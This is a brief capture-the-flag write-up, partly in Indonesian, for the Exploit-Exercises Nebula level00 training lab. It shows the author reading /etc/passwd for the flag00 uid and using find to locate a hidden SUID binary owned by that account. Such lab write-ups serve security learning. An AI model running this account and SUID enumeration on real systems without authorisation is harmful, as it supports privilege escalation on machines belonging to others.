Exploit-Exercises Nebula - Level00

Executive Summary

Challenge level00 exploit-exercise adalah suid program yang akan menjalakan program sebagai user ‘flag00’

About

This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories. Alternatively, look at the find man page. To access this level, log in as level00 with the password of level00.

Proof Of Concept

Karena suid program akan dieksekusi sebagai user flag00, saya mengecek user id dari user flag00 pada /etc/passwd agar hasil pencarian lebih spesifik.

[email protected]:~$ cat /etc/passwd | grep flag00
flag00:x:999:999::/home/flag00:/bin/sh

Lalu menggunakan command find untuk mencari suid program dari user id 999

[email protected]:~$ find / -perm -4000 -uid 999 2>/dev/null
/bin/.../flag00
/rofs/bin/.../flag00
[email protected]:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
[email protected]:~$ /rofs/bin/.../flag00
Congrats, now run getflag to get your flag!
[email protected]:~$